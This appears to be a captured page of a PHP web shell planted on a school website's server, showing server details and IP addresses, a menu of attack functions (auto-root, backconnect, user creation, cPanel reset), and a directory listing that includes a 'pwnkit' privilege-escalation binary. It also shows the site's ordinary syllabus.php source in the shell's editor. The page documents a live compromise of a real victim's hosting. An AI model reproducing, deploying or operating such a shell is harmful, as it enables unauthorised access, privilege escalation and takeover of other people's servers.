Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.188.233.69
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
nbspublicschool /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
nbs_website
[ DIR ]
drwxr-xr-x
.htaccess
370
B
-r-----r--
.mad-root
0
B
-rw-r--r--
contact.php
5.55
KB
-rw-r--r--
css.php
146
B
-rw-r--r--
disclosure.php
1.75
KB
-rw-r--r--
event.php
1.95
KB
-rw-r--r--
facility.php
3.72
KB
-rw-r--r--
faculty.php
2.17
KB
-rw-r--r--
homework.php
7.88
KB
-rw-r--r--
index.php
35.98
KB
-rw-r--r--
index2.php
14.7
KB
-rw-r--r--
msg.php
3.18
KB
-rw-r--r--
news.php
1.94
KB
-rw-r--r--
profile.php
5.65
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
syllabus.php
2.46
KB
-rw-r--r--
tc.php
3.74
KB
-rw-r--r--
tc_view.php
2.24
KB
-rw-r--r--
topper_result.php
1.73
KB
-rw-r--r--
video.php
1.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : syllabus.php
<?php include('include/header.php'); ?> <!--- breadcrumb ---> <div class="category_ flw"> <div class="container"> <div class="left_"> <h1>Syllabus <span></span></h1> </div> <div class="right_"> <ul class="cat_navigation"> <li><a href="#">Home</a></li> <li><span class="ion-android-arrow-dropright-circle"></span></li> <li><a href="#">Syllabus</a></li> </ul> </div> </div> </div> <!---// breadcrumb ---> <!--- side buttton ---> <div class="mybutton"> <a href="contact"><img src="images/cont.jpg" class="img-fluid" /></a> </div> <!---// side buttton ---> <!--- main ---> <main id="main" class="page_content page_class_single flw"> <div class="container"> <div class="row"> <!-- leftview --> <div class="col-md-12 col-lg-12 text-center hw"> <h1 class="theme-color">CLICK TO DOWNLOAD SYLLABUS <span></span></h1> </div> <?php $sql_fa= "SELECT * FROM syllabus ORDER BY syllabus_id DESC "; $fa_que=mysqli_query($obj->mysqli,$sql_fa); while($fa_row=mysqli_fetch_assoc($fa_que)) { ?> <div class="col-md-4 col-lg-4"> <div class="leftview flw"> <div class="questions flw"> <div class="accordion"> <!-- Section 1 --> <div class="accordion_in"> <div class="acc_head"><span class="ion-android-playstore"></span>Class :- <?= $fa_row['class'] ?></div> <ul class="acc_content list-inline"> <li><span class="pr30"><?= $fa_row['class'] ?></span><a href="nbs_website/_saving/syllabus/<?= $fa_row['syllabus_upload'] ?>" target="_blank" class="btn btn-primary"> Download Syllabus</a> </li> </ul> </div> <!-- Section 1 --> </div> </div> </div> </div> <?php } ?> <!-- end leftview --> </div> <!-- end classes related --> </div> </main> <!---// main ---> <?php include('include/footer.php'); ?>
Close